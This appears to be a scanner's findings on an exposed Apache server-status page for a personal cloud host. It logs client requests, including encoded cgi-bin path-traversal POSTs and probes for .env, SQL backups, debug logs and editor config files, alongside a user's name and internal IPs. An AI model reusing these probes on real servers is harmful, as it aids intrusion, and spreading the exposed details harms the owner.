165.227.173.41http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-29825182820/8/5269_ 1.48969311699219640.00.0853.10 167.94.138.42http/1.1 1-29825182820/10/5366_ 1.70527918928530.00.0779.32 205.210.31.9http/1.1 2-283-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb2b06257c
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 13-Sep-2024 22:38:47 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 297 Parent Server MPM Generation: 296 Server uptime: 294 days 15 hours 39 minutes 7 seconds Server load: 0.00 0.00 0.00 Total accesses: 453952 - Total Traffic: 8.3 GB - Total Duration: 75136506 CPU Usage: u853.75 s1657.35 cu3251.77 cs1034.57 - .0267% CPU load .0178 requests/sec - 351 B/second - 19.2 kB/request - 165.516 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12509769no0yes025000 32509770no0yes124000 Sum200 149000 ........................._________________________.............. ..........._W_______________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-283-0/0/5481. 0.00111832408720280.00.00105.38 103.121.39.54h2ravignon.mycloud.paris:443GET /logs/debug.log HTTP/2.0 0-283-0/0/5424. 0.00111832418059590.00.0081.64 103.121.39.54h2ravignon.mycloud.paris:443GET /errors.log HTTP/2.0 0-283-0/0/5527. 0.00111832408496030.00.0093.51 103.121.39.54h2ravignon.mycloud.paris:443GET /backup.sql HTTP/2.0 0-283-0/0/5472. 0.00111832408377100.00.00100.68 103.121.39.54h2ravignon.mycloud.paris:443[6858/6858] done 0-283-0/0/5519. 0.00111832428579270.00.00102.77 103.121.39.54h2ravignon.mycloud.paris:443GET /htdocs/index.php HTTP/2.0 0-283-0/0/5588. 0.00111832408636270.00.00122.92 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=views HTTP/2.0 0-283-0/0/5494. 0.00111832408343630.00.0074.72 103.121.39.54h2ravignon.mycloud.paris:443GET /tmp/debug.log HTTP/2.0 0-283-0/0/5502. 0.0011183242448350640.00.0095.40 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=events HTTP/2.0 0-283-0/0/5403. 0.00111832428456620.00.0089.40 103.121.39.54h2ravignon.mycloud.paris:443[6834/6834] done: stream 13667, GET /.idea 0-283-0/0/5529. 0.0011183241378898780.00.00171.17 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=security HTTP/2.0 0-283-0/0/5475. 0.0011183241348336540.00.0078.86 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=profiling HTTP/2.0 0-283-0/0/5468. 0.00111832408281790.00.0070.27 103.121.39.54h2ravignon.mycloud.paris:443GET /assets/debug.log HTTP/2.0 0-283-0/0/5542. 0.0011183242638765250.00.0091.75 103.121.39.54h2ravignon.mycloud.paris:443GET /log/debug.log HTTP/2.0 0-283-0/0/5466. 0.00111832408614240.00.0078.11 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=log HTTP/2.0 0-283-0/0/5571. 0.00111832408573160.00.0055.78 103.121.39.54h2ravignon.mycloud.paris:443GET /cache/debug.log HTTP/2.0 0-283-0/0/5558. 0.0011183242539052910.00.0095.51 83.97.73.245http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-283-0/0/5481. 0.0011183241348670760.00.00128.73 103.121.39.54h2ravignon.mycloud.paris:443GET /.config/debug.log HTTP/2.0 0-283-0/0/5431. 0.0011183241388496420.00.00115.95 103.121.39.54h2ravignon.mycloud.paris:443GET /debug.php HTTP/2.0 0-283-0/0/5438. 0.0011183242368233660.00.0089.22 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=db HTTP/2.0 0-283-0/0/5381. 0.00111832408696600.00.0087.94 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=router HTTP/2.0 0-283-0/0/5430. 0.00111832408189520.00.0064.21 103.121.39.54h2ravignon.mycloud.paris:443GET /access.log HTTP/2.0 0-283-0/0/5427. 0.00111832408564340.00.0066.85 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=request HTTP/2.0 0-283-0/0/5349. 0.0011183241358151910.00.0075.01 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=mail HTTP/2.0 0-283-0/0/5465. 0.00111832418564690.00.0091.29 103.121.39.54h2ravignon.mycloud.paris:443GET /debug/default/view?panel=asset HTTP/2.0 0-283-0/0/5452. 0.00111832408583350.00.00112.48 103.121.39.54h2ravignon.mycloud.paris:443GET /database.sql HTTP/2.0 1-29625097690/29/5282_ 7.4811479143550.00.1981.80 164.90.228.79h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-29625097690/26/5362_ 7.7012599359360.00.4198.46 164.90.228.79http/1.1 1-29625097690/36/5340_ 7.651408508723950.00.2093.46 54.37.79.75http/1.1 1-29625097690/41/5448_ 7.60129006620.00.2455.96 164.90.228.79http/1.1 1-29625097690/41/5402_ 7.8801279138120.00.2779.71 164.90.228.79http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-29625097690/36/5287_ 7.4553111459255740.00.2192.19 54.37.79.75http/1.1 1-29625097690/25/5369_ 7.401658922950.00.1557.09 164.90.228.79http/1.1 1-29625097690/34/5408_ 7.8811579077430.00.22130.79 164.90.228.79http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-29625097690/34/5423_ 7.721408528870860.00.2192.46 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-29625097690/30/5394_ 7.62145862629262650.00.1757.15 45.148.10.242http/1.1 1-29625097690/28/5343_ 7.731367428662030.00.1393.07 213.32.122.81http/1.1localhost:80GET / HTTP/1.1 1-29625097690/32/5272_ 7.40956729135100.00.1895.25 51.15.75.28http/1.1 1-29625097690/30/5407_ 7.7790972759127200.00.21102.97 8.211.42.174http/1.1ravignon.mycloud.paris:443GET /dns-query?dns=IBEBAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ HTTP/ 1-29625097690/37/5335_ 7.79601908906240.00.2392.50 194.163.170.151http/1.1ravignon.mycloud.paris:443POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-29625097690/32/5354_ 7.8422609041920.00.1993.18 164.90.228.79http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-29625097690/37/5231_ 7.77605538900110.00.2191.28 185.224.128.83http/1.1localhost:80GET / HTTP/1.1 1-29625097690/37/5380_ 7.80531119238740.00.2287.66 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-29625097690/29/5223_ 6.8511718675850.00.1795.62 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-29625097690/22/5262_ 6.646019778716300.00.13125.26 167.94.145.100http/1.1 1-29625097690/44/5276_ 7.720111712630.00.2878.34 45.148.10.242http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-29625097690/28/5290_ 7.661367438882640.00.1598.36 51.83.152.238http/1.1localhost:80POST / HTTP/1.1 1-29625097690/32/5246_ 7.4290972109152310.00.18112.63 54.37.79.75http/1.1 1-29625097690/30/5404_ 7.66605009076830.00.1696.61 2.57.122.123http/1.1localhost:80POST / HTTP/1.1 1-29625097690/36/5253_ 7.82494509172160.00.2452.97 8.216.83.6http/1.1ravignon.mycloud.paris:443POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 1-296
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb937f56a3
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Monday, 11-Dec-2023 10:50:51 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 17 days 3 hours 51 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 31265 - Total Traffic: 416.9 MB - Total Duration: 5804284 CPU Usage: u58.34 s100.66 cu230.79 cs71.17 - .0311% CPU load .0211 requests/sec - 294 B/second - 13.7 kB/request - 185.648 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01145669no1yes025001 31145670no0yes124000 Sum201 149001 _________________________....................................... ...........W________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1911456690/18/523_ 3.3390152963210.00.154.56 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/10/470_ 2.5724168850670.00.064.77 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-1911456690/13/482_ 3.070136986050.00.082.99 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/17/495_ 3.4661331025570.00.112.91 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/16/516_ 3.4661331032070.00.113.60 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-1911456690/11/491_ 2.7261154865090.00.0920.72 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/13/506_ 3.251212927800.00.093.05 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/12/480_ 3.465151879330.00.0612.34 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/16/484_ 3.391220893330.00.114.33 178.62.3.65http/1.1 0-1911456690/9/512_ 3.141201992780.00.063.78 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/14/498_ 3.3711341021420.00.099.36 178.62.3.65h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-1911456690/13/491_ 3.031164915250.00.086.91 178.62.3.65h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-1911456690/10/524_ 3.2612131091060.00.093.23 178.62.3.65h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-1911456690/12/508_ 3.3811431085880.00.063.11 178.62.3.65http/1.1 0-1911456690/12/504_ 3.2711010979180.00.102.90 178.62.3.65http/1.1 0-1911456690/13/528_ 3.41246167990880.00.1014.19 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/8/464_ 2.551210935390.00.053.22 178.62.3.65h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-1911456690/14/499_ 3.290148900490.00.102.96 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-1911456690/11/459_ 3.20241183849700.00.0813.12 184.168.125.148http/1.1ravignon.mycloud.paris:443GET /phpinfo HTTP/1.1 0-1911456690/14/508_ 3.33901651107260.00.1015.21 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/13/487_ 3.40246111968610.00.0913.29 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/16/503_ 3.42951841007550.00.133.31 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/13/483_ 3.4466163962030.00.089.61 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/11/513_ 3.4466146904330.00.083.36 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-1911456690/11/497_ 3.0061173999530.00.073.27 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-18-0/0/280. 0.003904868426410.00.001.73 172.104.137.47http/1.1ravignon.mycloud.paris:443GET /admin.jsa HTTP/1.1 1-18-0/0/263. 0.003904857472350.00.0011.38 54.36.115.221http/1.1 1-18-0/0/286. 0.003904860478660.00.002.03 172.104.137.47http/1.1 1-18-0/0/285. 0.003904861470670.00.001.78 54.36.115.221http/1.1 1-18-0/0/287. 0.00390481591710.00.0021.22 198.12.229.99http/1.1localhost:80GET / HTTP/1.1 1-18-0/0/275. 0.0039048186492010.00.001.79 172.104.137.47http/1.1 1-18-0/0/267. 0.00390480472290.00.008.77 172.104.137.47http/1.1 1-18-0/0/268. 0.003904866400270.00.001.56 172.104.137.47http/1.1 1-18-0/0/274. 0.0039048162447120.00.005.13 185.233.19.155http/1.1 1-18-0/0/260. 0.00390480465640.00.006.40 172.104.137.47http/1.1localhost:80GET / HTTP/1.1 1-18-0/0/317. 0.003904854432350.00.005.00 198.12.229.99http/1.1 1-18-0/0/288. 0.003904893433340.00.001.96 172.104.137.47http/1.1 1-18-0/0/273. 0.00390482421040.00.003.55 172.104.137.47http/1.1 1-18-0/0/254. 0.0039048257370490.00.001.57 45.165.204.64http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-18-0/0/264. 0.00390480419100.00.005.15 172.104.137.47http/1.1 1-18-0/0/281. 0.003904854472780.00.008.89 172.104.137.47http/1.1ravignon.mycloud.paris:443GET /admin.cgi HTTP/1.1 1-18-0/0/291. 0.003904870400070.00.006.87 172.104.137.47http/1.1 1-18-0/0/258. 0.0039048236453150.00.0012.21 34.140.248.32http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-18-0/0/263. 0.00390481457130.00.001.56 185.233.19.155http/1.1localhost:80GET / HTTP/1.1 1-18-0/0/255. 0.00390480416010.00.004.47 172.104.137.47http/1.1 1-18-0/0/257. 0.00390481346020.00.001.51 101.91.148.219http/1.1localhost:80GET / HTTP/1.1 1-18-0/0/242. 0.00390480499250.00.002.47 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-18-0/0/296. 0.00390482496870.00.0012.94 121.185.223.240http/1.1localhost:80GET / HTTP/1.0 1-18-0/0/274. 0.00390481461300.00.006.14 121.185.223.240http/1.1 1-18-0/0/288. 0.00390481547320.00.004.66 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 2-18-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fba45a3f8f
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Thursday, 16-Nov-2023 16:57:42 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 47 Parent Server MPM Generation: 46 Server uptime: 41 days 13 hours 52 minutes 16 seconds Server load: 0.10 0.03 0.01 Total accesses: 56742 - Total Traffic: 750.8 MB - Total Duration: 46162837 CPU Usage: u116.42 s222.56 cu417.38 cs116.16 - .0243% CPU load .0158 requests/sec - 219 B/second - 13.5 kB/request - 813.557 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1680315no0yes025000 2680316no0yes124000 Sum200 149000 ........................._______________________________________ ____W______..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/326. 0.0028258590589730.00.002.19 120.198.36.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0028258590543720.00.002.28 27.195.120.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/336. 0.0028258590545190.00.002.42 69.164.213.115http/1.1 0-8-0/0/318. 0.0028258592564660.00.002.68 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-8-0/0/310. 0.0028258590488710.00.002.01 164.52.0.93http/1.1 0-8-0/0/317. 0.0028258592513160.00.003.47 107.6.112.252http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/358. 0.0028258590606820.00.002.32 107.6.112.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-8-0/0/332. 0.0028258590573270.00.004.14 35.203.211.6http/1.1 0-8-0/0/327. 0.002825859210589440.00.002.36 162.55.103.197http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8-0/0/343. 0.0028258591626100.00.004.02 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/297. 0.0028258590549710.00.002.35 35.203.211.6http/1.1 0-8-0/0/315. 0.002825859139532070.00.0011.75 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0028258590555260.00.006.49 18.184.165.11http/1.1 0-8-0/0/332. 0.0028258590496420.00.002.08 35.203.211.6http/1.1 0-8-0/0/337. 0.00282585991555810.00.003.54 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-8-0/0/328. 0.0028258590602940.00.001.97 199.230.124.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/334. 0.0028258590517220.00.003.74 35.203.211.6http/1.1 0-8-0/0/321. 0.0028258593458780.00.004.09 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/319. 0.0028258591558050.00.002.20 173.214.166.170http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/330. 0.0028258590578770.00.002.16 44.197.188.109http/1.1 0-8-0/0/329. 0.0028258590582210.00.002.93 89.248.165.51http/1.1 0-8-0/0/348. 0.0028258592678910.00.002.44 101.74.200.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/339. 0.0028258591634660.00.0010.38 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/332. 0.0028258590627220.00.002.22 107.6.112.252http/1.1 0-8-0/0/310. 0.0028258590572310.00.001.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-466803150/25/1186_ 5.8902252185280.00.1311.31 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/29/1117_ 5.99153572055030.00.177.44 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-466803150/28/1124_ 5.7701562067880.00.238.55 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/30/1153_ 5.901781502260030.00.1812.64 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-466803150/27/1102_ 6.01331551813940.00.1514.58 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-466803150/26/1193_ 5.73282012261870.00.1614.19 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/21/1109_ 5.83281221944860.00.137.92 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-466803150/26/1151_ 5.9541392122980.00.149.55 192.53.126.23http/1.1 1-466803150/24/1138_ 5.50282051950990.00.1519.19 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/26/1114_ 5.7451441814530.00.1517.89 192.53.126.23http/1.1 1-466803150/25/1146_ 5.921481322232550.00.1520.81 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-466803150/20/1118_ 5.811486432113640.00.1313.91 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-466803150/29/1155_ 6.01331552081310.00.197.23 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-466803150/29/1107_ 5.991531732518940.00.2110.16 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/24/1128_ 5.781781771950750.00.1212.67 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/30/1167_ 6.02331531919670.00.189.41 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/26/1112_ 5.94281752097170.00.1823.26 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/28/1135_ 5.98183751956550.00.208.26 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/22/1122_ 5.8461861990380.00.1410.45 192.53.126.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-466803150/27/1103_ 5.8641491906770.00.159.89 192.53.126.23http/1.1 1-466803150/30/1146_ 6.053682230080.00.1911.26 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-466803150/22/1153_ 5.8541432271760.00.147.89 192.53.126.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-466803150/29/1095_ 6.062542081500.00.2218.78 192.53.126.23http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-466803150/24/1139_ 6.0801322095370.00.178.00 192.53.126.23http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-466803150/23/1170_ 6.0621252291390.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb2d26f01e
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Thursday, 09-Nov-2023 10:10:28 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 34 days 7 hours 5 minutes 2 seconds Server load: 0.00 0.01 0.00 Total accesses: 46592 - Total Traffic: 604.4 MB - Total Duration: 44295900 CPU Usage: u92.97 s181.24 cu338.41 cs92.96 - .0238% CPU load .0157 requests/sec - 213 B/second - 13.3 kB/request - 950.719 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1567550no0yes124000 2567551no0yes025000 Sum200 149000 ........................._____________________W_________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/326. 0.0021966250589730.00.002.19 120.198.36.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0021966250543720.00.002.28 27.195.120.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/336. 0.0021966250545190.00.002.42 69.164.213.115http/1.1 0-8-0/0/318. 0.0021966252564660.00.002.68 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-8-0/0/310. 0.0021966250488710.00.002.01 164.52.0.93http/1.1 0-8-0/0/317. 0.0021966252513160.00.003.47 107.6.112.252http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/358. 0.0021966250606820.00.002.32 107.6.112.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-8-0/0/332. 0.0021966250573270.00.004.14 35.203.211.6http/1.1 0-8-0/0/327. 0.002196625210589440.00.002.36 162.55.103.197http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8-0/0/343. 0.0021966251626100.00.004.02 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/297. 0.0021966250549710.00.002.35 35.203.211.6http/1.1 0-8-0/0/315. 0.002196625139532070.00.0011.75 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0021966250555260.00.006.49 18.184.165.11http/1.1 0-8-0/0/332. 0.0021966250496420.00.002.08 35.203.211.6http/1.1 0-8-0/0/337. 0.00219662591555810.00.003.54 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-8-0/0/328. 0.0021966250602940.00.001.97 199.230.124.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/334. 0.0021966250517220.00.003.74 35.203.211.6http/1.1 0-8-0/0/321. 0.0021966253458780.00.004.09 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/319. 0.0021966251558050.00.002.20 173.214.166.170http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/330. 0.0021966250578770.00.002.16 44.197.188.109http/1.1 0-8-0/0/329. 0.0021966250582210.00.002.93 89.248.165.51http/1.1 0-8-0/0/348. 0.0021966252678910.00.002.44 101.74.200.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/339. 0.0021966251634660.00.0010.38 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/332. 0.0021966250627220.00.002.22 107.6.112.252http/1.1 0-8-0/0/310. 0.0021966250572310.00.001.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-395675500/14/980_ 3.1121311803720.00.099.95 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-395675500/11/923_ 2.89391251675110.00.076.11 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-395675500/17/935_ 3.17392681743950.00.107.30 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-395675500/10/959_ 3.26441281879040.00.0511.42 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-395675500/8/908_ 2.5369731503710.00.0610.44 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-395675500/11/982_ 3.17392081859300.00.0810.82 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-395675500/13/941_ 3.26441591613230.00.076.86 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-395675500/22/945_ 3.0228321719010.00.188.06 165.232.76.155h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-395675500/15/945_ 3.2821901606710.00.1216.71 165.232.76.155http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-395675500/13/934_ 3.02391151551560.00.1116.53 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-395675500/14/951_ 3.3011651867180.00.1119.51 165.232.76.155http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-395675500/11/936_ 3.0228401725340.00.0712.76 165.232.76.155http/1.1 1-395675500/12/950_ 3.3111361709680.00.105.87 165.232.76.155http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-395675500/11/919_ 3.1922232109690.00.076.02 165.232.76.155http/1.1 1-395675500/9/939_ 2.8011771618080.00.0511.55 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 